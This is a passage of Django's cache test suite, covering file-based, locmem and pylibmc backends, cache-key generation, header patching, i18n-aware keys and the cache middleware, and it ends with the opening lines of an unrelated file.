should_disconnect_on_close = False # By default, pylibmc/libmemcached don't verify keys client-side and so # this test triggers a server-side bug that causes later tests to fail # (#19914). The `verify_keys` behavior option could be set to True (which # would avoid triggering the server-side bug), however this test would # still fail due to https://github.com/lericson/pylibmc/issues/219. @unittest.skip("triggers a memcached-server bug, causing subsequent tests to fail") def test_invalid_key_characters(self): pass @override_settings(CACHES=caches_setting_for_tests( base=PyLibMCCache_params, exclude=memcached_excluded_caches, OPTIONS={ 'binary': True, 'behaviors': {'tcp_nodelay': True}, }, )) def test_pylibmc_options(self): self.assertTrue(cache._cache.binary) self.assertEqual(cache._cache.behaviors['tcp_nodelay'], int(True)) @override_settings(CACHES=caches_setting_for_tests( BACKEND='django.core.cache.backends.filebased.FileBasedCache', )) class FileBasedCacheTests(BaseCacheTests, TestCase): """ Specific test cases for the file-based cache. """ def setUp(self): super().setUp() self.dirname = tempfile.mkdtemp() # Caches location cannot be modified through override_settings / modify_settings, # hence settings are manipulated directly here and the setting_changed signal # is triggered manually. 
for cache_params in settings.CACHES.values(): cache_params.update({'LOCATION': self.dirname}) setting_changed.send(self.__class__, setting='CACHES', enter=False) def tearDown(self): super().tearDown() # Call parent first, as cache.clear() may recreate cache base directory shutil.rmtree(self.dirname) def test_ignores_non_cache_files(self): fname = os.path.join(self.dirname, 'not-a-cache-file') with open(fname, 'w'): os.utime(fname, None) cache.clear() self.assertTrue(os.path.exists(fname), 'Expected cache.clear to ignore non cache files') os.remove(fname) def test_clear_does_not_remove_cache_dir(self): cache.clear() self.assertTrue(os.path.exists(self.dirname), 'Expected cache.clear to keep the cache dir') def test_creates_cache_dir_if_nonexistent(self): os.rmdir(self.dirname) cache.set('foo', 'bar') os.path.exists(self.dirname) def test_get_ignores_enoent(self): cache.set('foo', 'bar') os.unlink(cache._key_to_file('foo')) # Returns the default instead of erroring. self.assertEqual(cache.get('foo', 'baz'), 'baz') def test_get_does_not_ignore_non_filenotfound_exceptions(self): with mock.patch('builtins.open', side_effect=IOError): with self.assertRaises(IOError): cache.get('foo') def test_empty_cache_file_considered_expired(self): cache_file = cache._key_to_file('foo') with open(cache_file, 'wb') as fh: fh.write(b'') with open(cache_file, 'rb') as fh: self.assertIs(cache._is_expired(fh), True) @override_settings(CACHES={ 'default': { 'BACKEND': 'cache.liberal_backend.CacheClass', }, }) class CustomCacheKeyValidationTests(SimpleTestCase): """ Tests for the ability to mixin a custom ``validate_key`` method to a custom cache backend that otherwise inherits from a builtin backend, and override the default key validation. Refs #6447. 
    """
    def test_custom_key_validation(self):
        # this key is both longer than 250 characters, and has spaces
        key = 'some key with spaces' * 15
        val = 'a value'
        cache.set(key, val)
        self.assertEqual(cache.get(key), val)


@override_settings(
    CACHES={
        'default': {
            'BACKEND': 'cache.closeable_cache.CacheClass',
        }
    }
)
class CacheClosingTests(SimpleTestCase):
    """The cache backend's close() hook runs at end of request."""

    def test_close(self):
        self.assertFalse(cache.closed)
        # request_finished triggers the cache's close() handler.
        signals.request_finished.send(self.__class__)
        self.assertTrue(cache.closed)


# Baseline locmem settings; the NEVER_EXPIRING variant below differs only
# in having TIMEOUT=None.
DEFAULT_MEMORY_CACHES_SETTINGS = {
    'default': {
        'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        'LOCATION': 'unique-snowflake',
    }
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None


class DefaultNonExpiringCacheKeyTests(SimpleTestCase):
    """
    Settings having Cache arguments with a TIMEOUT=None create Caches that will
    set non-expiring keys.
    """
    def setUp(self):
        # The 5 minute (300 seconds) default expiration time for keys is
        # defined in the implementation of the initializer method of the
        # BaseCache type.
        self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout

    def tearDown(self):
        del(self.DEFAULT_TIMEOUT)

    def test_default_expiration_time_for_keys_is_5_minutes(self):
        """The default expiration time of a cache key is 5 minutes.

        This value is defined in
        django.core.cache.backends.base.BaseCache.__init__().
        """
        self.assertEqual(300, self.DEFAULT_TIMEOUT)

    def test_caches_with_unset_timeout_has_correct_default_timeout(self):
        """Caches that have the TIMEOUT parameter undefined in the default
        settings will use the default 5 minute timeout.
        """
        cache = caches[DEFAULT_CACHE_ALIAS]
        self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)

    @override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
    def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
        """Memory caches that have the TIMEOUT parameter set to `None` in the
        default settings will have `None` as the default timeout.
        This means "no timeout".
        """
        cache = caches[DEFAULT_CACHE_ALIAS]
        self.assertIsNone(cache.default_timeout)
        self.assertIsNone(cache.get_backend_timeout())

    @override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
    def test_caches_with_unset_timeout_set_expiring_key(self):
        """Memory caches that have the TIMEOUT parameter unset will set cache
        keys having the default 5 minute timeout.
        """
        key = "my-key"
        value = "my-value"
        cache = caches[DEFAULT_CACHE_ALIAS]
        cache.set(key, value)
        cache_key = cache.make_key(key)
        # locmem stores the expiry timestamp in _expire_info.
        self.assertIsNotNone(cache._expire_info[cache_key])

    @override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
    def test_caches_set_with_timeout_as_none_set_non_expiring_key(self):
        """Memory caches that have the TIMEOUT parameter set to `None` will set
        a non expiring key by default.
        """
        key = "another-key"
        value = "another-value"
        cache = caches[DEFAULT_CACHE_ALIAS]
        cache.set(key, value)
        cache_key = cache.make_key(key)
        # None in _expire_info means the key never expires.
        self.assertIsNone(cache._expire_info[cache_key])


@override_settings(
    CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
    CACHE_MIDDLEWARE_SECONDS=1,
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        },
    },
    USE_I18N=False,
    ALLOWED_HOSTS=['.example.com'],
)
class CacheUtils(SimpleTestCase):
    """TestCase for django.utils.cache functions."""

    def setUp(self):
        self.host = 'www.example.com'
        self.path = '/cache/test/'
        self.factory = RequestFactory(HTTP_HOST=self.host)

    def tearDown(self):
        cache.clear()

    def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
        # Build a request flagged for the cache-update middleware pass.
        request = self._get_request(self.host, self.path, method, query_string=query_string)
        request._cache_update_cache = True if not update_cache else update_cache
        return request

    def _set_cache(self, request, msg):
        # Push a response through the update middleware to populate the cache.
        response = HttpResponse()
        response.content = msg
        return UpdateCacheMiddleware().process_response(request, response)

    def test_patch_vary_headers(self):
        headers = (
            # Initial vary, new headers, resulting vary.
            (None, ('Accept-Encoding',), 'Accept-Encoding'),
            ('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
            ('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
            ('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
            ('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
            ('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
            (None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
            ('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
            ('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
        )
        for initial_vary, newheaders, resulting_vary in headers:
            with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
                response = HttpResponse()
                if initial_vary is not None:
                    response['Vary'] = initial_vary
                patch_vary_headers(response, newheaders)
                self.assertEqual(response['Vary'], resulting_vary)

    def test_get_cache_key(self):
        request = self.factory.get(self.path)
        response = HttpResponse()
        # Expect None if no headers have been set yet.
        self.assertIsNone(get_cache_key(request))
        # Set headers to an empty list.
        learn_cache_key(request, response)
        self.assertEqual(
            get_cache_key(request),
            'views.decorators.cache.cache_page.settingsprefix.GET.'
            '18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
        )
        # A specified key_prefix is taken into account.
        key_prefix = 'localprefix'
        learn_cache_key(request, response, key_prefix=key_prefix)
        self.assertEqual(
            get_cache_key(request, key_prefix=key_prefix),
            'views.decorators.cache.cache_page.localprefix.GET.'
            '18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
        )

    def test_get_cache_key_with_query(self):
        request = self.factory.get(self.path, {'test': 1})
        response = HttpResponse()
        # Expect None if no headers have been set yet.
        self.assertIsNone(get_cache_key(request))
        # Set headers to an empty list.
learn_cache_key(request, response) # The querystring is taken into account. self.assertEqual( get_cache_key(request), 'views.decorators.cache.cache_page.settingsprefix.GET.' 'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e' ) def test_cache_key_varies_by_url(self): """ get_cache_key keys differ by fully-qualified URL instead of path """ request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com') learn_cache_key(request1, HttpResponse()) request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com') learn_cache_key(request2, HttpResponse()) self.assertNotEqual(get_cache_key(request1), get_cache_key(request2)) def test_learn_cache_key(self): request = self.factory.head(self.path) response = HttpResponse() response['Vary'] = 'Pony' # Make sure that the Vary header is added to the key hash learn_cache_key(request, response) self.assertEqual( get_cache_key(request), 'views.decorators.cache.cache_page.settingsprefix.GET.' '18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e' ) def test_patch_cache_control(self): tests = ( # Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts (None, {'private': True}, {'private'}), ('', {'private': True}, {'private'}), # Test whether private/public attributes are mutually exclusive ('private', {'private': True}, {'private'}), ('private', {'public': True}, {'public'}), ('public', {'public': True}, {'public'}), ('public', {'private': True}, {'private'}), ('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}), ('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}), ('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}), ) cc_delim_re = re.compile(r'\s*,\s*') for initial_cc, newheaders, expected_cc in tests: with self.subTest(initial_cc=initial_cc, newheaders=newheaders): response = HttpResponse() if initial_cc is not None: 
                    response['Cache-Control'] = initial_cc
                patch_cache_control(response, **newheaders)
                # Compare as a set: directive order is not significant.
                parts = set(cc_delim_re.split(response['Cache-Control']))
                self.assertEqual(parts, expected_cc)


@override_settings(
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
            'KEY_PREFIX': 'cacheprefix',
        },
    },
)
class PrefixedCacheUtils(CacheUtils):
    # Re-runs CacheUtils with a KEY_PREFIX configured.
    pass


@override_settings(
    CACHE_MIDDLEWARE_SECONDS=60,
    CACHE_MIDDLEWARE_KEY_PREFIX='test',
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        },
    },
)
class CacheHEADTest(SimpleTestCase):
    """HEAD requests interact correctly with the cache middleware."""

    def setUp(self):
        self.path = '/cache/test/'
        self.factory = RequestFactory()

    def tearDown(self):
        cache.clear()

    def _set_cache(self, request, msg):
        response = HttpResponse()
        response.content = msg
        return UpdateCacheMiddleware().process_response(request, response)

    def test_head_caches_correctly(self):
        test_content = 'test content'
        request = self.factory.head(self.path)
        request._cache_update_cache = True
        self._set_cache(request, test_content)

        request = self.factory.head(self.path)
        request._cache_update_cache = True
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        self.assertIsNotNone(get_cache_data)
        self.assertEqual(test_content.encode(), get_cache_data.content)

    def test_head_with_cached_get(self):
        # A HEAD request is served from a previously cached GET response.
        test_content = 'test content'
        request = self.factory.get(self.path)
        request._cache_update_cache = True
        self._set_cache(request, test_content)

        request = self.factory.head(self.path)
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        self.assertIsNotNone(get_cache_data)
        self.assertEqual(test_content.encode(), get_cache_data.content)


@override_settings(
    CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        },
    },
    LANGUAGES=[
        ('en', 'English'),
        ('es', 'Spanish'),
    ],
)
class CacheI18nTest(TestCase):
    """Cache keys account for i18n/l10n/timezone state."""

    def setUp(self):
        self.path = '/cache/test/'
        self.factory = RequestFactory()

    def tearDown(self):
        cache.clear()
    @override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
    def test_cache_key_i18n_translation(self):
        request = self.factory.get(self.path)
        lang = translation.get_language()
        response = HttpResponse()
        key = learn_cache_key(request, response)
        self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
        key2 = get_cache_key(request)
        self.assertEqual(key, key2)

    def check_accept_language_vary(self, accept_language, vary, reference_key):
        # Helper: for a given Accept-Language header and Vary list, the
        # learned and retrieved keys must both equal reference_key.
        request = self.factory.get(self.path)
        request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
        request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
        response = HttpResponse()
        response['Vary'] = vary
        key = learn_cache_key(request, response)
        key2 = get_cache_key(request)
        self.assertEqual(key, reference_key)
        self.assertEqual(key2, reference_key)

    @override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
    def test_cache_key_i18n_translation_accept_language(self):
        lang = translation.get_language()
        self.assertEqual(lang, 'en')
        request = self.factory.get(self.path)
        request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
        response = HttpResponse()
        response['Vary'] = 'accept-encoding'
        key = learn_cache_key(request, response)
        self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
        # The same key results regardless of Accept-Language spelling or the
        # ordering of the Vary header entries.
        self.check_accept_language_vary(
            'en-us',
            'cookie, accept-language, accept-encoding',
            key
        )
        self.check_accept_language_vary(
            'en-US',
            'cookie, accept-encoding, accept-language',
            key
        )
        self.check_accept_language_vary(
            'en-US,en;q=0.8',
            'accept-encoding, accept-language, cookie',
            key
        )
        self.check_accept_language_vary(
            'en-US,en;q=0.8,ko;q=0.6',
            'accept-language, cookie, accept-encoding',
            key
        )
        self.check_accept_language_vary(
            'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
            'accept-encoding, cookie, accept-language',
            key
        )
        self.check_accept_language_vary(
            'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
            'accept-language, accept-encoding, cookie',
            key
        )
        self.check_accept_language_vary(
            'ko;q=1.0,en;q=0.5',
            'cookie, accept-language, accept-encoding',
            key
        )
        self.check_accept_language_vary(
            'ko, en',
            'cookie, accept-encoding, accept-language',
            key
        )
        self.check_accept_language_vary(
            'ko-KR, en-US',
            'accept-encoding, accept-language, cookie',
            key
        )

    @override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
    def test_cache_key_i18n_formatting(self):
        request = self.factory.get(self.path)
        lang = translation.get_language()
        response = HttpResponse()
        key = learn_cache_key(request, response)
        self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
        key2 = get_cache_key(request)
        self.assertEqual(key, key2)

    @override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
    def test_cache_key_i18n_timezone(self):
        request = self.factory.get(self.path)
        tz = timezone.get_current_timezone_name()
        response = HttpResponse()
        key = learn_cache_key(request, response)
        self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
        key2 = get_cache_key(request)
        self.assertEqual(key, key2)

    @override_settings(USE_I18N=False, USE_L10N=False)
    def test_cache_key_no_i18n(self):
        request = self.factory.get(self.path)
        lang = translation.get_language()
        tz = timezone.get_current_timezone_name()
        response = HttpResponse()
        key = learn_cache_key(request, response)
        self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
        self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")

    @override_settings(
        CACHE_MIDDLEWARE_KEY_PREFIX="test",
        CACHE_MIDDLEWARE_SECONDS=60,
        USE_I18N=True,
    )
    def test_middleware(self):
        def set_cache(request, lang, msg):
            # Activate the language, then cache the response content.
            translation.activate(lang)
            response = HttpResponse()
            response.content = msg
            return UpdateCacheMiddleware().process_response(request, response)

        # cache with non empty request.GET
        request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
        request._cache_update_cache = True
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        # first access, cache must return None
        self.assertIsNone(get_cache_data)
        response = HttpResponse()
        content = 'Check for cache with QUERY_STRING'
        response.content = content
        UpdateCacheMiddleware().process_response(request, response)
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        # cache must return content
        self.assertIsNotNone(get_cache_data)
        self.assertEqual(get_cache_data.content, content.encode())

        # different QUERY_STRING, cache must be empty
        request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
        request._cache_update_cache = True
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        self.assertIsNone(get_cache_data)

        # i18n tests
        en_message = "Hello world!"
        es_message = "Hola mundo!"

        request = self.factory.get(self.path)
        request._cache_update_cache = True
        set_cache(request, 'en', en_message)
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        # The cache can be recovered
        self.assertIsNotNone(get_cache_data)
        self.assertEqual(get_cache_data.content, en_message.encode())
        # change the session language and set content
        request = self.factory.get(self.path)
        request._cache_update_cache = True
        set_cache(request, 'es', es_message)
        # change again the language
        translation.activate('en')
        # retrieve the content from cache
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        self.assertEqual(get_cache_data.content, en_message.encode())
        # change again the language
        translation.activate('es')
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        self.assertEqual(get_cache_data.content, es_message.encode())
        # reset the language
        translation.deactivate()

    @override_settings(
        CACHE_MIDDLEWARE_KEY_PREFIX="test",
        CACHE_MIDDLEWARE_SECONDS=60,
    )
    def test_middleware_doesnt_cache_streaming_response(self):
        request = self.factory.get(self.path)
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        self.assertIsNone(get_cache_data)

        content = ['Check for cache with streaming content.']
        response = StreamingHttpResponse(content)
        UpdateCacheMiddleware().process_response(request, response)

        # Streaming responses must never be stored in the cache.
        get_cache_data = FetchFromCacheMiddleware().process_request(request)
        self.assertIsNone(get_cache_data)


@override_settings(
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
            'KEY_PREFIX': 'cacheprefix'
        },
    },
)
class PrefixedCacheI18nTest(CacheI18nTest):
    # Re-runs CacheI18nTest with a KEY_PREFIX configured.
    pass


def hello_world_view(request, value):
    # Minimal view used as a caching target in the middleware tests.
    return HttpResponse('Hello World %s' % value)


def csrf_view(request):
    # View that forces a CSRF cookie to be set on the response.
    return HttpResponse(csrf(request)['csrf_token'])


@override_settings(
    CACHE_MIDDLEWARE_ALIAS='other',
    CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
    CACHE_MIDDLEWARE_SECONDS=30,
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        },
        'other': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
            'LOCATION': 'other',
            'TIMEOUT': '1',
        },
    },
)
class CacheMiddlewareTest(SimpleTestCase):
    """Behavior of CacheMiddleware as middleware and as view decorator."""

    def setUp(self):
        super().setUp()
        self.factory = RequestFactory()
        self.default_cache = caches['default']
        self.other_cache = caches['other']

    def tearDown(self):
        self.default_cache.clear()
        self.other_cache.clear()
        super().tearDown()

    def test_constructor(self):
        """
        Ensure the constructor is correctly distinguishing between usage of
        CacheMiddleware as Middleware vs. usage of CacheMiddleware as view
        decorator and setting attributes appropriately.
        """
        # If no arguments are passed in construction, it's being used as middleware.
        middleware = CacheMiddleware()

        # Now test object attributes against values defined in setUp above
        self.assertEqual(middleware.cache_timeout, 30)
        self.assertEqual(middleware.key_prefix, 'middlewareprefix')
        self.assertEqual(middleware.cache_alias, 'other')

        # If arguments are being passed in construction, it's being used as a decorator.
# First, test with "defaults": as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None) self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30 self.assertEqual(as_view_decorator.key_prefix, '') # Value of DEFAULT_CACHE_ALIAS from django.core.cache self.assertEqual(as_view_decorator.cache_alias, 'default') # Next, test with custom values: as_view_decorator_with_custom = CacheMiddleware(cache_timeout=60, cache_alias='other', key_prefix='foo') self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60) self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo') self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other') def test_middleware(self): middleware = CacheMiddleware() prefix_middleware = CacheMiddleware(key_prefix='prefix1') timeout_middleware = CacheMiddleware(cache_timeout=1) request = self.factory.get('/view/') # Put the request through the request middleware result = middleware.process_request(request) self.assertIsNone(result) response = hello_world_view(request, '1') # Now put the response through the response middleware response = middleware.process_response(request, response) # Repeating the request should result in a cache hit result = middleware.process_request(request) self.assertIsNotNone(result) self.assertEqual(result.content, b'Hello World 1') # The same request through a different middleware won't hit result = prefix_middleware.process_request(request) self.assertIsNone(result) # The same request with a timeout _will_ hit result = timeout_middleware.process_request(request) self.assertIsNotNone(result) self.assertEqual(result.content, b'Hello World 1') def test_view_decorator(self): # decorate the same view with different cache decorators default_view = cache_page(3)(hello_world_view) default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view) explicit_default_view = cache_page(3, cache='default')(hello_world_view) 
        explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)

        other_view = cache_page(1, cache='other')(hello_world_view)
        other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)

        request = self.factory.get('/view/')

        # Request the view once
        response = default_view(request, '1')
        self.assertEqual(response.content, b'Hello World 1')

        # Request again -- hit the cache
        response = default_view(request, '2')
        self.assertEqual(response.content, b'Hello World 1')

        # Requesting the same view with the explicit cache should yield the same result
        response = explicit_default_view(request, '3')
        self.assertEqual(response.content, b'Hello World 1')

        # Requesting with a prefix will hit a different cache key
        response = explicit_default_with_prefix_view(request, '4')
        self.assertEqual(response.content, b'Hello World 4')

        # Hitting the same view again gives a cache hit
        response = explicit_default_with_prefix_view(request, '5')
        self.assertEqual(response.content, b'Hello World 4')

        # And going back to the implicit cache will hit the same cache
        response = default_with_prefix_view(request, '6')
        self.assertEqual(response.content, b'Hello World 4')

        # Requesting from an alternate cache won't hit cache
        response = other_view(request, '7')
        self.assertEqual(response.content, b'Hello World 7')

        # But a repeated hit will hit cache
        response = other_view(request, '8')
        self.assertEqual(response.content, b'Hello World 7')

        # And prefixing the alternate cache yields yet another cache entry
        response = other_with_prefix_view(request, '9')
        self.assertEqual(response.content, b'Hello World 9')

        # But if we wait a couple of seconds...
        time.sleep(2)

        # ... the default cache will still hit
        caches['default']
        response = default_view(request, '11')
        self.assertEqual(response.content, b'Hello World 1')

        # ... the default cache with a prefix will still hit
        response = default_with_prefix_view(request, '12')
        self.assertEqual(response.content, b'Hello World 4')

        # ... the explicit default cache will still hit
        response = explicit_default_view(request, '13')
        self.assertEqual(response.content, b'Hello World 1')

        # ... the explicit default cache with a prefix will still hit
        response = explicit_default_with_prefix_view(request, '14')
        self.assertEqual(response.content, b'Hello World 4')

        # .. but a rapidly expiring cache won't hit
        response = other_view(request, '15')
        self.assertEqual(response.content, b'Hello World 15')

        # .. even if it has a prefix
        response = other_with_prefix_view(request, '16')
        self.assertEqual(response.content, b'Hello World 16')

    def test_cached_control_private_not_cached(self):
        """Responses with 'Cache-Control: private' are not cached."""
        view_with_private_cache = cache_page(3)(cache_control(private=True)(hello_world_view))
        request = self.factory.get('/view/')
        response = view_with_private_cache(request, '1')
        self.assertEqual(response.content, b'Hello World 1')
        # A second call returns fresh content, proving no cache hit occurred.
        response = view_with_private_cache(request, '2')
        self.assertEqual(response.content, b'Hello World 2')

    def test_sensitive_cookie_not_cached(self):
        """
        Django must prevent caching of responses that set a user-specific (and
        maybe security sensitive) cookie in response to a cookie-less request.
        """
        csrf_middleware = CsrfViewMiddleware()
        cache_middleware = CacheMiddleware()

        request = self.factory.get('/view/')
        self.assertIsNone(cache_middleware.process_request(request))

        csrf_middleware.process_view(request, csrf_view, (), {})

        response = csrf_view(request)
        response = csrf_middleware.process_response(request, response)
        response = cache_middleware.process_response(request, response)

        # Inserting a CSRF cookie in a cookie-less request prevented caching.
        self.assertIsNone(cache_middleware.process_request(request))

    def test_304_response_has_http_caching_headers_but_not_cached(self):
        original_view = mock.Mock(return_value=HttpResponseNotModified())
        view = cache_page(2)(original_view)
        request = self.factory.get('/view/')
        # The view shouldn't be cached on the second call.
        view(request).close()
        response = view(request)
        response.close()
        self.assertEqual(original_view.call_count, 2)
        self.assertIsInstance(response, HttpResponseNotModified)
        self.assertIn('Cache-Control', response)
        self.assertIn('Expires', response)


@override_settings(
    CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
    CACHE_MIDDLEWARE_SECONDS=1,
    CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        },
    },
    USE_I18N=False,
)
class TestWithTemplateResponse(SimpleTestCase):
    """
    Tests various headers w/ TemplateResponse.

    Most are probably redundant since they manipulate the same object
    anyway but the ETag header is 'special' because it relies on the
    content being complete (which is not necessarily always the case
    with a TemplateResponse)
    """
    def setUp(self):
        self.path = '/cache/test/'
        self.factory = RequestFactory()

    def tearDown(self):
        cache.clear()

    def test_patch_vary_headers(self):
        headers = (
            # Initial vary, new headers, resulting vary.
            (None, ('Accept-Encoding',), 'Accept-Encoding'),
            ('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
            ('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
            ('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
            ('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
            ('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
            (None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
            ('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
            ('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
        )
        for initial_vary, newheaders, resulting_vary in headers:
            with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
                # Same matrix as CacheUtils.test_patch_vary_headers, but
                # applied to a (possibly unrendered) TemplateResponse.
                template = engines['django'].from_string("This is a test")
                response = TemplateResponse(HttpRequest(), template)
                if initial_vary is not None:
                    response['Vary'] = initial_vary
                patch_vary_headers(response, newheaders)
                self.assertEqual(response['Vary'], resulting_vary)

    def test_get_cache_key(self):
        request = self.factory.get(self.path)
        template = engines['django'].from_string("This is a test")
        response = TemplateResponse(HttpRequest(), template)
        key_prefix = 'localprefix'
        # Expect None if no headers have been set yet.
        self.assertIsNone(get_cache_key(request))
        # Set headers to an empty list.
        learn_cache_key(request, response)

        self.assertEqual(
            get_cache_key(request),
            'views.decorators.cache.cache_page.settingsprefix.GET.'
            '58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
        )
        # A specified key_prefix is taken into account.
        learn_cache_key(request, response, key_prefix=key_prefix)
        self.assertEqual(
            get_cache_key(request, key_prefix=key_prefix),
            'views.decorators.cache.cache_page.localprefix.GET.'
            '58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
        )

    def test_get_cache_key_with_query(self):
        request = self.factory.get(self.path, {'test': 1})
        template = engines['django'].from_string("This is a test")
        response = TemplateResponse(HttpRequest(), template)
        # Expect None if no headers have been set yet.
        self.assertIsNone(get_cache_key(request))
        # Set headers to an empty list.
        learn_cache_key(request, response)
        # The querystring is taken into account.
        self.assertEqual(
            get_cache_key(request),
            'views.decorators.cache.cache_page.settingsprefix.GET.'
            '0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
        )


class TestMakeTemplateFragmentKey(SimpleTestCase):
    """Key generation for the {% cache %} template-fragment helper."""

    def test_without_vary_on(self):
        key = make_template_fragment_key('a.fragment')
        self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')

    def test_with_one_vary_on(self):
        key = make_template_fragment_key('foo', ['abc'])
        self.assertEqual(key, 'template.cache.foo.900150983cd24fb0d6963f7d28e17f72')

    def test_with_many_vary_on(self):
        key = make_template_fragment_key('bar', ['abc', 'def'])
        self.assertEqual(key, 'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88')

    def test_proper_escaping(self):
        # Characters like ':' and '%' in vary_on values must not collide.
        key = make_template_fragment_key('spam', ['abc:def%'])
        self.assertEqual(key, 'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469')


class CacheHandlerTest(SimpleTestCase):
    """The `caches` handler hands out per-thread singleton instances."""

    def test_same_instance(self):
        """
        Attempting to retrieve the same alias should yield the same instance.
        """
        cache1 = caches['default']
        cache2 = caches['default']

        self.assertIs(cache1, cache2)

    def test_per_thread(self):
        """
        Requesting the same alias from separate threads should yield separate
        instances.
        """
        c = []

        def runner():
            c.append(caches['default'])

        for x in range(2):
            t = threading.Thread(target=runner)
            t.start()
            t.join()

        self.assertIsNot(c[0], c[1])
# wikisourcetext.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
